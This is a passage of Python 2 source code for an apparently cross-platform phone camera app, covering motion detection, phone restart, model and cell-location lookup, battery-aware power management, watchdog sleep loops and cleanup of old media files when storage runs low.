hotspot[hotspotIndex][0][1] = percentsUL_Y / 100.0
hotspot[hotspotIndex][1][0] = percentsLR_X / 100.0
hotspot[hotspotIndex][1][1] = percentsLR_Y / 100.0
# BEFORE_MAIN: For modularity we execute here!!
SetMotionDetectionHotspot(0, 0.0, 0.0, 100.0, 100.0)
SetMotionDetectionHotspot(1, 50.0, 50.0, 80.0, 80.0)
"""
numHotspots = 1
differentPixelsPercentageThreshold = [5.0]
"""
# numHotspots = 2
numHotspots = 1
differentPixelsPercentageThreshold = [5.0, 10.0]
sizeMotionCheckWindow = (40, 30)
def DetectMotion(aPrevVFFrame, aCrtVFFrame):
# See http://wiki.forum.nokia.com/index.php/Motion_detection_with_camera
global numHotspots, hotspot, differentPixelsPercentageThreshold, \
sizeMotionCheckWindow
try:
# for hotspotIndex in range(0, numHotspots):
for hotspotIndex in range(numHotspots):
(crtWidth, crtHeight) = aCrtVFFrame.size
# Draw a red rectangle.
#aCrtVFFrame.rectangle([ (hotspot[hotspotIndex][0][0] * crtWidth,
# hotspot[hotspotIndex][0][1] * crtHeight),
# (hotspot[hotspotIndex][1][0] * (crtWidth - 1),
# hotspot[hotspotIndex][1][1] * (crtHeight - 1))], 0xff0000)
#aCrtVFFrame.rectangle([ (hotspot[hotspotIndex][0][0] * crtWidth,
# hotspot[hotspotIndex][0][1] * crtHeight),
# (hotspot[hotspotIndex][1][0] * (crtWidth - 1),
# hotspot[hotspotIndex][1][1] * (199 - 1))], 0xff0000)
crtStepX = int(crtWidth / sizeMotionCheckWindow[0])
crtStepY = int(crtHeight / sizeMotionCheckWindow[1])
#differentPixelsThreshold = crtWidth * crtHeight * \
# differentPixelsPercentageThreshold[hotspotIndex] / 100.0
differentPixelsThreshold = sizeMotionCheckWindow[0] * \
sizeMotionCheckWindow[1] * \
differentPixelsPercentageThreshold[hotspotIndex] / 100.0
numDifferentPixels = 0
for y in range(int(hotspot[hotspotIndex][0][1] *
crtHeight), int(hotspot[hotspotIndex][1][1] *
(crtHeight - 1)), crtStepY):
for x in range(int(hotspot[hotspotIndex][0][0] * crtWidth),
int(hotspot[hotspotIndex][1][0] *
(crtWidth - 1)), crtStepX):
(r, g, b) = aCrtVFFrame.getpixel((x, y))[0]
(prevr, prevg, prevb) = aPrevVFFrame.getpixel((x, y))[0]
delta = abs(r - prevr) + abs(g - prevg) + abs(b - prevb)
if delta > 3 * 10: # 3 * 30):
numDifferentPixels += 1
if numDifferentPixels > differentPixelsThreshold: #40
DebugPrint("DetectMotion(): detected motion - " \
"numDifferentPixels = %d > " \
"differentPixelsThreshold = %d." % \
(numDifferentPixels,
int(differentPixelsThreshold)))
return True
"""
From http://discussion.forum.nokia.com/forum/showthread.php?114751-Is-there-a-setpixel-for-image-objects
(a bit also http://discussion.forum.nokia.com/forum/showthread.php?120004-How-to-access-pixel-array-of-image-captured-by-viewfinder)
"""
#aCrtVFFrame.point( (x, y), newRGB )
DebugPrint("DetectMotion(): did NOT detect motion - " \
"numDifferentPixels = %d <= differentPixelsThreshold = %d." % \
(numDifferentPixels, int(differentPixelsThreshold)))
"""
# Before it was 160 x 120 ; (1152, 864)
im = camera.take_photo('RGB', (320,240))
# Red outline
im.rectangle([(10,10),(40,40)], 0xff0000)
# No code for this square
im.rectangle([(120,10),(150,40)], 0xff0000)
# Check hot spot whether active
box = Image.new((30,30), 'L') # gray scale
box.blit(im, (10,10,40,40))
data = getdata(box, 8)
# Check difference for motion
pixdiff = 0
for x,y in zip(data, last1):
# pix threshold 15/256
if abs(ord(x) - ord(y)) > 15:
pixdiff += 1
# img threshold 90/900
if pixdiff > 90:
im.rectangle([(10,10),(40,40)], fill=0xff0000) # fill
# Motion detected
break
last1 = data
# Show camera
c.blit(im, (0,0), (8,12))
#miso.reset_inactivity_time()
"""
return False
except:
DebugPrintErrorTrace()
return False
###############################################################################
###############################################################################
###############################################################################
#########################END MOTION DETECTION##################################
###############################################################################
###############################################################################
def RestartPhone():
try:
"""
It seems in Python CE stderrFile.close() (or maybe stdoutFile.close())
gives exception
"script.py - 34 <type 'exceptions.IOError'>: [Errno 0] Error" .
"""
if WINDOWS_CE_OS_PYTHONCE == False:
if MY_DEBUG_STDOUT:
print "Entered RestartPhone()."
# if deviceId != IMEI_6680:
sys.stdout.flush()
stdoutFile.close()
if MY_DEBUG_STDERR:
# sys.stderr.flush()
stderrFile.close()
if SYMBIAN_OS:
"""
try:
# This requires PowerMgmt capabilities:
miso.restart_phone()
except:
DebugPrintErrorTrace()
# In case miso.restart_phone() doesn't work (either because miso
# library is not loaded, or because we don't have capabilities),
# use the alternative solution to restart phone.
"""
if S60_EDITION[0] >= 3:
# This is for S60 3rd+ edition.
e32.start_exe(u"z:\\sys\\bin\\starter.exe", "")
else:
"""
See http://discussion.forum.nokia.com/forum/showthread.php?108606-Reboot-device&ticket=ST-25966-eybpBkRcw9c1vkmQnQyzjYZSb6pEUFWftwA-20:
Works on S60 2nd edition (e.g., Nokia 6680).
"""
e32.start_exe(u"Z:\\System\\Programs\\Starter.exe", "")
elif ANDROID_OS:
pass
elif iOS_PYOBJC:
# Restarts the springboard.
subprocess.call(["/usr/bin/restart"])
#, stdout=fOutput, stderr=None)
elif WINDOWS_OS:
# Reboots
# /sbin/reboot
# pass
pass
elif WINDOWS_CE_OS_PYTHONCE:
# WinSpawn(r"\Storage Card\iCam\Restart.exe", [])
tmpPathFileName = LOCAL_FOLDER + "/Restart.exe"
# I think we require backslashes
tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
WinSpawn(tmpPathFileNameWithBackslashes, [])
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############More info about firmware types: ################################
##########Z:\1PhD\ReVival\1111PyS60_extensions\cyke642\firmware.py#############
###############################################################################
###############################################################################
def GetPhoneModel():
DebugPrint("Entered GetPhoneModel().")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
"""
Nokia6680 : sw_version = V 5.04.07 15-02-06 RM-36 (c) NOKIA
NokiaN95 : sw_version = V 30.0.015 15-07-08 RM-159 N95(c)NMP
NokiaN95 2: sw_version = V 35.0.002 18-11-09 RM-159 N95(c)NMP.
os_version = (2, 0, 1540). S60 version info = (3, 1).
Nokia6120 : sw_version = V 06.01 02-09-08 RM-243
NokiaN82 : (from *#0000#) V 31.0.016 09-12-08 RM-313 Nokia N82 (01.01)
NokiaC5 : sw_version = 031.022 28-Mar-2010 RM-645 (C)Nokia
"""
try:
"""
This gives error (I guess) if you don't have the right
capabilities - ReadUserData??
"""
swVersion = sysinfo.sw_version()
except:
DebugPrintErrorTrace()
if swVersion.find("RM-36") != -1:
modelName = "Nokia6680"
elif swVersion.find("RM-84") != -1:
modelName = "NokiaN70"
elif swVersion.find("RM-159") != -1:
modelName = "NokiaN95"
elif swVersion.find("RM-170") != -1:
modelName = "NokiaE50-1"
elif swVersion.find("RM-208") != -1:
modelName = "NokiaE65"
elif swVersion.find("RM-243") != -1:
modelName = "Nokia6120"
elif swVersion.find("RM-313") != -1:
modelName = "NokiaN82"
elif swVersion.find("RM-343") != -1:
modelName = "NokiaE66"
elif swVersion.find("RM-356") != -1 or swVersion.find("RM-428") != -1:
modelName = "Nokia5800"
elif swVersion.find("RM-412") != -1:
modelName = "NokiaE75"
elif swVersion.find("RM-437") != -1:
modelName = "NokiaE63"
elif swVersion.find("RM-504") != -1:
modelName = "Nokia5530"
elif swVersion.find("RM-505") != -1 or swVersion.find("RM-507") != -1:
modelName = "NokiaN97"
elif swVersion.find("RM-530") != -1:
modelName = "NokiaE72"
elif swVersion.find("RM-555") != -1:
modelName = "NokiaN97mini"
elif swVersion.find("RM-559") != -1:
modelName = "NokiaX6"
elif swVersion.find("RM-588") != -1 or swVersion.find("RM-594") != -1:
modelName = "Nokia5230"
elif swVersion.find("RM-596") != -1:
modelName = "NokiaN8"
elif swVersion.find("RM-612") != -1 or swVersion.find("RM-624") != -1:
modelName = "NokiaC6"
elif swVersion.find("RM-626") != -1:
modelName = "NokiaE7"
elif swVersion.find("RM-632") != -1:
modelName = "NokiaE5"
elif swVersion.find("RM-645") != -1:
modelName = "NokiaC5"
elif swVersion.find("RM-675") != -1:
modelName = "NokiaC7"
elif swVersion.find("RM-697") != -1 or swVersion.find("RM-719") != -1:
modelName = "NokiaC5-03"
elif swVersion.find("RM-697") != -1 or swVersion.find("RM-719") != -1:
modelName = "NokiaC5-03"
elif swVersion.find("SGH-G810") != -1:
# G810XDIB1 2009-02-11 SGH-G810 (c)Samsung
modelName = "SamsungSGH-G810"
else:
modelName = ""
modelFileName = "Z:/resource/versions/model.txt"
try:
if os.path.isfile(modelFileName):
"""
#Test if modelFileName exists.
fInput = open(modelFileName, "rb")
fInput.close()
"""
"""
#"This file exist only on 3rd ed onwards"
# (http://discussion.forum.nokia.com/forum/showthread.php?t=100115)
fInput = open("Z:/resource/versions/model.txt", "rb")
#fInput = open("Z:/resource/versions/model.txt", "r")
res = fInput.read()
fInput.close()
DebugPrint(res)
resF = res[2:].encode('ascii', 'ignore')
DebugPrint(resF)
"""
import codecs
# We use "utf-16" encoding:
fInput = codecs.open(modelFileName, "r", "utf-16")
for myLine in fInput:
# print str(line)
modelName = str(myLine)
if modelName.startswith("Nokia 6120"):
modelName = "Nokia6120"
elif modelName.startswith("Nokia 6680"):
modelName = "Nokia6680"
except:
modelName = "ModelUnknown"
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
#import unicodedata
#unicodedata.normalize("NFKD", title).encode("ascii", "ignore")
#import shutil
#shutil.copy2("Z:/resource/versions/model.txt", "E:/model.txt")
modelName = "UIQ-model"
elif ANDROID_OS:
# myDroid.makeToast(myDroid.getPhoneType().result)
modelName = str(myDroid.getPhoneType().result)
elif iOS_PYOBJC:
modelName = "iPhone-model"
elif WINDOWS_OS:
modelName = "WindowsPC"
elif WINDOWS_CE_OS_PYTHONCE:
modelName = "WindowsMobile"
elif UNIX_OS:
modelName = "LinuxPC"
elif RASPBIAN_OS:
modelName = "Raspberry " #!!!!TODO: use GPIO to get the rev model of RPi
"""
From http://raspi.tv/2014/rpi-gpio-quick-reference-updated-for-raspberry-pi-b
(see also http://raspi.tv/2013/rpi-gpio-basics-2-how-to-check-what-pi-board-revision-you-have )
# What Raspberry Pi revision are we running?
# 0 = Compute Module, 1 = Rev 1, 2 = Rev 2, 3 = Model B+
"""
#print "GPIO.RPI_REVISION = %s" % str(GPIO.RPI_REVISION)
import RPi.GPIO as GPIO
if GPIO.RPI_REVISION == 3:
modelName += "model B+"
elif GPIO.RPI_REVISION == 2:
modelName += "model B"
return modelName
def GetCurrentDateTimeStringWithMilliseconds():
# This is localtime(time), possibly adjusted if we have an S60 2nd ed phone
crtTime = GetCurrentDateTime()
"""
We use crtTime2 only to compute numMilliseconds.
"""
crtTime2 = GetTime()
# See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
#fileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
# ("_%03d%s" % (numMilliseconds, fileExtension))
return time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
"_%03d" % numMilliseconds
def GetCurrentDateTimeStringNice():
"""
crtTime = GetCurrentDateTime()
return time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
("_%03d" % numMilliseconds)
"""
# time.asctime(GetCurrentDateTime())
res = time.strftime("%H:%M:%S %d-%m-%Y", GetCurrentDateTime())
#print("GetCurrentDateTimeStringNice(): res = %s" % res)
return res
#return time.strftime("%H:%M:%S %d-%m-%Y", GetCurrentDateTime())
def isNaN(x):
return (type(x) is float) and (x != x)
def isFinite(x):
return x != Infinity
def GetGSMLocation():
global mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
try:
gsmLocation = location.gsm_location()
"""
From PyS60 documentation: "Note: Location module requires
capabilities ReadDeviceData, ReadUserData and Location."
See http://discussion.forum.nokia.com/forum/showthread.php?117964-gsm_location%28%29-None-Issue
for issue with Open signing for Location capability and
returning non-Null value:
"gsm_location() function ! gsm_location need caps Location
and self-signed cert has not this capability !"
"The only requirement for this is Python should be installed
and the installed Python Scriptshell must be signed by the
Dev cert with location capability."
"""
if gsmLocation is None:
if cellId is None:
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
else:
(mobileCountryCode, mobileNetworkCode,
locationAreaCode, cellId) = gsmLocation
except:
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
elif ANDROID_OS:
cellInfo = myDroid.getCellLocation()
mobileCountryCode = -1
mobileNetworkCode = -1
try:
locationAreaCode = int(cellInfo.result["lac"])
except:
locationAreaCode = -1
try:
cellId = int(cellInfo.result["cid"])
except:
cellId = -1
elif iOS_PYOBJC:
# print "myDroid.readPhoneState() =", myDroid.readPhoneState()
# print "myDroid.readLocation() =", myDroid.readLocation()
# "Requires API Level 7." (v 2.1)
#print "myDroid.readSignalStrengths() =", myDroid.readSignalStrengths()
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
elif WINDOWS_OS:
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
elif WINDOWS_CE_OS_PYTHONCE:
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
def CompareTimesOfDay(timeOfDay1, timeOfDay2):
#timeOfDay = (hour, min, sec, ...).
# Returns True if timeOfDay1 > timeOfDay2, else False.
if timeOfDay1[0] < timeOfDay2[0]:
return False
if timeOfDay1[0] > timeOfDay2[0]:
return True
if timeOfDay1[1] < timeOfDay2[1]:
return False
if timeOfDay1[1] > timeOfDay2[1]:
return True
if timeOfDay1[2] < timeOfDay2[2]:
return False
if timeOfDay1[2] > timeOfDay2[2]:
return True
# Maybe use numMilliseconds, as well.
# Nokia 6680
if deviceId == IMEI_6680:
dawnTimeVec = [7, 0, 0]
duskTimeVec = [15, 59, 59]
else:
# dawnTimeVec = [7, 0, 0]
dawnTimeVec = [0, 0, 0]
# duskTimeVec = [15, 59, 59]
duskTimeVec = [23, 59, 59]
#!!!!TODO: adapt to the current cameraMode, etc and uncomment in ReactiveLoop_real()
def ModeManager():
global videoRecordDuration
global dawnTimeVec, duskTimeVec
# return
try:
crtTime = GetCurrentDateTime()
if CompareTimesOfDay([crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec],
dawnTimeVec) and CompareTimesOfDay(duskTimeVec, [crtTime.tm_hour,
crtTime.tm_min, crtTime.tm_sec]):
# Day mode
DebugPrint("ModeManager(): Day mode - calling " \
"SetRecordDuration(0, 0) --> take photos.")
"""
"""
#!!!!TODO: adapt to the current cameraMode, etc
# To avoid setting too often - it stores state on drive.
if videoRecordDuration[0] != 0:
SetRecordDuration(0, 0)
else:
# SetRecordDuration(1, 0)
# Night mode
DebugPrint("ModeManager(): Night mode - calling " \
"SetRecordDuration(0, 15) --> record video.")
#!!!!TODO: adapt to the current cameraMode, etc
# To avoid setting too often - it stores state on drive.
if videoRecordDuration[0] == 0:
SetRecordDuration(0, 15)
except:
DebugPrintErrorTrace()
"""
http://discussion.forum.nokia.com/forum/showthread.php?p=743894#post743894
and http://snippets.dzone.com/posts/show/831
See also
http://discussion.forum.nokia.com/forum/showthread.php?202489-e32.Ao_timer%28%29.after%28...%29-crashes-for-more-than-30-minutes
"""
#!!!!TODO: take out if not being used
def LongAfter(aTimer, duration, callback):
"""
The PyS60 timer has a limitation: it can wait for at most 2147 seconds.
Therefore, we need to call several times after() to sleep longer than
that.
The reason is that Symbian method CTimer::After() takes a 32-bits integer
and it represents microseconds, and the max value of signed int is
2147483647 --> we can keep only 2147 seconds (35 mins, 47 secs).
"""
MAX_DURATION_ALLOWED_FOR_AFTER = 2100 # seconds
while duration > 0:
if duration > MAX_DURATION_ALLOWED_FOR_AFTER:
aTimer.after(MAX_DURATION_ALLOWED_FOR_AFTER)
duration -= MAX_DURATION_ALLOWED_FOR_AFTER
else:
aTimer.after(duration, callback)
duration = 0
if iOS_PYOBJC:
MAX_DURATION_BETWEEN_PETTING = 30 # seconds
else:
MAX_DURATION_BETWEEN_PETTING = 30 #seconds
#MAX_DURATION_BETWEEN_PETTING = 1 # seconds
if SYMBIAN_OS:
# BEFORE_MAIN!!
# if SYMBIAN_OS and SYMBIAN_S60_OS:
sleepAndPetWatchdogTimer = e32.Ao_timer()
"""
!!!!TODO: PowerManager should return:
return pauseIntervalPowerManaged, conserveEnergy, changedConserveEnergy
since conserveEnergy, changedConserveEnergy are not part of state anyhow
"""
def PowerManager():
global pauseInterval
global conserveEnergy, changedConserveEnergy
global uploadUnsentData
conserveEnergyOld = conserveEnergy
"""
EChargingStatusError = -1,
/// Charger not connected/uninitialized
EChargingStatusNotConnected = 0,
/// Device is charging
EChargingStatusCharging = 1,
/// Charger is connected, device not charging
EChargingStatusNotCharging = 2,
/// Charging almost completed
EChargingStatusAlmostComplete = 3,
/// Charging completed
EChargingStatusChargingComplete = 4,
/// Charging continued after brief interruption
EChargingStatusChargingContinued = 5
if GetChargerStatus() == 0:
#Conserve energy
elif GetChargerStatus() == 1,5:
#Conserve energy somewhat.
elif GetChargerStatus() == 2:
#Go for maximum performance.
elif GetChargerStatus() == 3, 4:
pass
"""
try:
crtGetBatteryLevelPercentage = float(GetBatteryLevelPercentage())
crtGetChargerStatus = GetChargerStatus()
pauseIntervalPowerManaged = pauseInterval
"""
# Power manage the cellphone - attempt to avoid running out of power.
#if (crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD( or
# (crtGetChargerStatus == 0):
#if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
"""
if deviceId == IMEI_E7:
# For Nokia E7 we power manage even without the charger on.
if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
conserveEnergy = True
else:
conserveEnergy = False
else:
"""
# VERY CONSERVATIVE POLICY - gets in standby immediately when
# charger gets disconnected.
if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
conserveEnergy = True
elif crtGetChargerStatus == 0:
conserveEnergy = True
"""
if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD / 2:
conserveEnergy = True
elif (crtGetChargerStatus == 0) and \
(crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD):
conserveEnergy = True
else:
conserveEnergy = False
if conserveEnergy == conserveEnergyOld:
changedConserveEnergy = False
else:
changedConserveEnergy = True
"""
# Nokia 6120 and 6680 and N95
#if (deviceId == IMEI_6120) or (deviceId == IMEI_6680) or
# (deviceId == IMEI_N95):
# Nokia 6120 and 6680 and N95 and N82
#if deviceId in [IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
# Nokia 6120 and 6680 and N95 and N82
#if deviceId in [IMEI_E7, IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
"""
if conserveEnergy == True:
"""
if True:
!!!!Treat the else case for this if
"""
"""
if GetBatteryLevelPercentage() <= 50.0:
pauseInterval = 30 * 60 #30 min
else:
"""
pauseIntervalPowerManaged = PAUSE_INTERVAL_POWER_MANAGED
#conserveEnergy = True
#uploadUnsentData = 0
if MY_DEBUG_STDOUT:
print "PowerManager(): crtGetBatteryLevelPercentage = %f, " \
"crtGetChargerStatus = %d --> adjusting " \
"pauseIntervalPowerManaged = %d." % \
(crtGetBatteryLevelPercentage,
crtGetChargerStatus,
pauseIntervalPowerManaged)
if conserveEnergy == False:
sys.stdout.flush()
return pauseIntervalPowerManaged
except:
DebugPrintErrorTrace()
"""
SleepAndPetWatchdog(duration) changes the duty-cycle of the app
(PowerManager() determies it), we make this simple implementation:
- pauseInterval always remains the configured value (e.g., 240 secs)
- we have duration = PowerManager() to adjust the duration (e.g, make
it 10 hours if PowerManager() considers we need to conserve energy
since we are low on battery energy)
- we need to pet every MAX_DURATION_BETWEEN_PETTING.
So we have a loop
while duration > 0:
...
duration -= MAX_DURATION_BETWEEN_PETTING
...
# We check if power came back after a power down in order to get out of (a big) sleep.
if powerManage:
PowerManager()
...
"""
def SleepAndPetWatchdog(duration, powerManage=False):
global sleepAndPetWatchdogTimer, pauseInterval
global MAX_DURATION_BETWEEN_PETTING
global modeManagerIsEnabled
global sentBTMessageTo6680
DebugPrint("SleepAndPetWatchdog(): Entered SleepAndPetWatchdog().")
# duration = pauseInterval
"""
"""
if SYMBIAN_OS:
try:
"""
One needs to give at least before the first after() a cancel,
otherwise will receive "RuntimeError: Timer pending - cancel
first"
"""
sleepAndPetWatchdogTimer.cancel()
except:
DebugPrintErrorTrace()
if powerManage:
if modeManagerIsEnabled:
ModeManager()
"""
This basically makes duration = pauseInterval (or 10 hours if the
charger is not charging).
"""
duration = PowerManager()
if deviceId == IMEI_N82:
if (changedConserveEnergy == True) and (conserveEnergy == True) and \
(sentBTMessageTo6680 == 0):
# We just changed to conserveEnergy == True state
ExecuteCommands("send-command-via-bluetooth " + BT_ADDR_6680 + \
" set-pause-interval %d" % \
PAUSE_INTERVAL_POWER_MANAGED)
"""
To avoid losing the fact iCam sent the above BT command, if it
crashes, then we store in sentBTMessageTo6680 the fact it
sent (or not) this message. We can then use this info when
iCam restarts, if necessary.
"""
sentBTMessageTo6680 = 1
StoreState()
try:
while duration > 0:
if duration > MAX_DURATION_BETWEEN_PETTING:
if SYMBIAN_OS:
sleepAndPetWatchdogTimer.after(MAX_DURATION_BETWEEN_PETTING)
elif ANDROID_OS or RASPBIAN_OS:
DebugPrint("SleepAndPetWatchdog(): " \
"MAX_DURATION_BETWEEN_PETTING = %d." % \
MAX_DURATION_BETWEEN_PETTING)
time.sleep(MAX_DURATION_BETWEEN_PETTING)
elif iOS_PYOBJC:
DebugPrint("SleepAndPetWatchdog(): Before time.sleep() " \
"of MAX_DURATION_BETWEEN_PETTING = %d." % \
MAX_DURATION_BETWEEN_PETTING)
"""
It crashes app when MAX_DURATION_BETWEEN_PETTING = 30,
around the middle, I guess.
"""
time.sleep(MAX_DURATION_BETWEEN_PETTING)
# time.sleep(1)
DebugPrint("SleepAndPetWatchdog(): finished time.sleep().")
elif WINDOWS_CE_OS_PYTHONCE:
DebugPrint("SleepAndPetWatchdog(): " \
"MAX_DURATION_BETWEEN_PETTING = %d." % \
MAX_DURATION_BETWEEN_PETTING)
time.sleep(MAX_DURATION_BETWEEN_PETTING)
#e32.ao_sleep(MAX_DURATION_BETWEEN_PETTING)
duration -= MAX_DURATION_BETWEEN_PETTING
pauseIntervalOld = pauseInterval # !!!! NOT USED
PetWatchdog()
if powerManage:
"""
In case the charger is powered after being stopped and we made
duration very big (to sleep a lot), we stop sleeping.
Also, this helps in case we change from (very) big pauseInterval
to a smaller pauseInterval by stopping the sleep.
THIS DOESN'T WORK VERY WELL IF pauseInterval is big (e.g., 1
hour, etc), BUT IT'S NOT A SERIOUS FLAW.
"""
#if duration > PowerManager():
# return
#
# We check if power came back after a power down in order to get out of sleep.
PowerManager()
if (changedConserveEnergy == True) and (conserveEnergy == False):
# We just changed back to having/receiving energy
if deviceId == IMEI_N82:
if sentBTMessageTo6680 == 1:
"""
Note that it is possible that iCam is stopped
when power comes back and we miss this event -
that is why we save as part of state
sentBTMessageTo6680 (we could also rely on the
iCam server, that better checks the state of
the phones in the "LAN") in order to check and
act, if necessary, also when iCam starts.
!!!!This is not great since 6680 might have a
different pauseInterval than 240 - create
special iCam command:
information-a-different-phone-charger-down
"""
ExecuteCommands("send-command-via-bluetooth " + \
BT_ADDR_6680 + " set-pause-interval 240")
sentBTMessageTo6680 = 0
StoreState()
return
"""
#In case the PowerManager decides to make pauseInterval shorter.
if pauseInterval < pauseIntervalOld:
return
"""
#if durationOriginal - \
# duration % MAX_DURATION_BETWEEN_PETTING == pauseInterval
"""
For BT client devices we should receive only BT messages with
commands (CMD), so this should take very little time.
This ensures fast responsiveness also when iCam is in
~standby mode (pauseInterval is 10 hrs or more)
"""
if bluetoothMode == 2:
BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
else:
if SYMBIAN_OS:
sleepAndPetWatchdogTimer.after(duration)
elif ANDROID_OS or RASPBIAN_OS:
DebugPrint("SleepAndPetWatchdog(): duration = %d." % \
duration)
time.sleep(duration)
elif WINDOWS_CE_OS_PYTHONCE:
DebugPrint("SleepAndPetWatchdog(): duration = %d." % \
duration)
time.sleep(duration)
# e32.ao_sleep(duration)
duration = 0
PetWatchdog()
except:
DebugPrintErrorTrace()
# Returns the amount of free RAM in bytes.
def GetFreeRAM():
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
return sysinfo.free_ram()
elif SYMBIAN_UIQ_OS:
return 123456789
elif ANDROID_OS:
return 123456789
elif iOS_PYOBJC:
return 123456789
elif WINDOWS_CE_OS_PYTHONCE:
return 123456789
elif WINDOWS_OS:
return 123456789
elif UNIX_OS:
return 123456789
elif RASPBIAN_OS:
return 123456789
# Returns the free space in bytes on the drive aDriveStr.
def GetFreeDriveSpace(aDriveStr):
try:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
"""
We treat sysinfo.free_drivespace() returning int (on PyS60 1.4.5,
normally on S60 2nd edition) or pair of ints (for PyS60 2.0).
"""
try:
dictDrives = sysinfo.free_drivespace()
if isinstance(dictDrives[unicode(aDriveStr)], int):
return dictDrives[unicode(aDriveStr)]
elif isinstance(dictDrives[unicode(aDriveStr)], tuple):
"""
This is for our altered sysinfo module that returns 2 ints
instead of 1, since freeSpace is 64 bits and we can have
drives with more than 2GB.
"""
"""
DebugPrint("GetFreeDriveSpace(aDriveStr = %s): " \
"(0 = %d, 1 = %d)." % (aDriveStr,
dictDrives[unicode(aDriveStr)][0],
dictDrives[unicode(aDriveStr)][1]))
"""
#return dictDrives[unicode(aDriveStr)][1] +
# (dictDrives[unicode(aDriveStr)][0] << 32)
#return dictDrives[unicode(aDriveStr)][1] |
# (dictDrives[unicode(aDriveStr)][0] << 32)
# """
"""
IMPORTANT: We require < to specify little endian and ALSO
no alignment (see http://docs.python.org/library/struct.html)
"""
strPack = struct.pack("<ii",
dictDrives[unicode(aDriveStr)][1],
dictDrives[unicode(aDriveStr)][0])
"""
IMPORTANT: We require < to specify little endian and ALSO
no alignment (see http://docs.python.org/library/struct.html)
"""
(myVal, ) = struct.unpack("<q", strPack)
return myVal
else:
# """
return -1
except:
#DebugPrintErrorTrace()
return -1
elif SYMBIAN_UIQ_OS:
return -1
elif ANDROID_OS:
"""
DOESN'T WORK: return os.statvfs(aDriveStr).f_bfree
#AttributeError: 'module' object has no attribute 'statvfs'
"""
"""
From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
(see also http://ubuntuforums.org/showthread.php?t=961505):
"""
# s = os.statvfs('/')
# print (s.f_bavail * s.f_frsize) / 1024
"""
!!!!TODO: try it out
from jnius import autoclass # move in front
StatFs = autoclass("android.os.StatFs")
stats = StatFs(aDriveStr)
availableBlocks = stats.getAvailableBlocks()
blockSizeInBytes = stats.getBlockSize()
freeSpaceInBytes = availableBlocks * blockSizeInBytes
"""
return -1
elif WINDOWS_CE_OS_PYTHONCE:
"""
# Seems not to work on WinCE
# From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
# (see also http://stackoverflow.com/questions/2973480/available-disk-space-on-an-smb-share-via-python
# and http://bytes.com/topic/python/answers/609682-how-check-remaining-hard-drive-space-windows)
try:
LOCAL_DRIVE_AUX = "\\Storage Card"
freeDriveSpace = ctypes.c_ulonglong(0)
#ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(LOCAL_DRIVE),
# None, None, ctypes.pointer(freeDriveSpace))
ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(LOCAL_DRIVE_AUX),
None, None, ctypes.pointer(freeDriveSpace))
return freeDriveSpace.value
except:
DebugPrintErrorTrace()
return -1
"""
return -1
elif iOS_PYOBJC:
return -1
elif WINDOWS_OS:
# From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(aDriveStr),
None, None, ctypes.pointer(free_bytes))
DebugPrint("GetFreeDriveSpace(): free_bytes.value = %d." % \
free_bytes.value)
return free_bytes.value
# return -1
elif UNIX_OS or RASPBIAN_OS:
"""
Note: for Unix aDriveStr doesn't really matter,
so it can be a "bogus" value
# UNIX (they say MacOS also):
# From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
# (see also http://ubuntuforums.org/showthread.php?t=961505):
"""
s = os.statvfs("/")
# print (s.f_bavail * s.f_frsize) / 1024
res = s.f_bavail * s.f_frsize
DebugPrint("GetFreeDriveSpace(aDriveStr=%s): returning %d." % \
(aDriveStr, res))
return res
except:
DebugPrintErrorTrace()
return -1
# Putting a "quota" on free space
AT_LEAST_FREE_DRIVESPACE_TO_STOP = 100 * 1024 * 1024
def EraseOldestFilesFromFolder(aFolder, atLeastFreeDrivespaceToStop):
if GetFreeDriveSpace(aFolder[:2]) >= atLeastFreeDrivespaceToStop:
return
try:
DebugPrint("EraseOldestFilesFromFolder(): aFolder = %s." % aFolder)
mediaFolderContent = os.listdir(aFolder)
# sortedMediaFolderContent = sorted(mediaFolderContent)
"""
sort() without parameters is the ONLY one that works in Python 2.2.
(Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
"""
mediaFolderContent.sort()
sortedMediaFolderContent = mediaFolderContent
# print "sortedMediaFolderContent =", sortedMediaFolderContent
for mediaFileName in sortedMediaFolderContent:
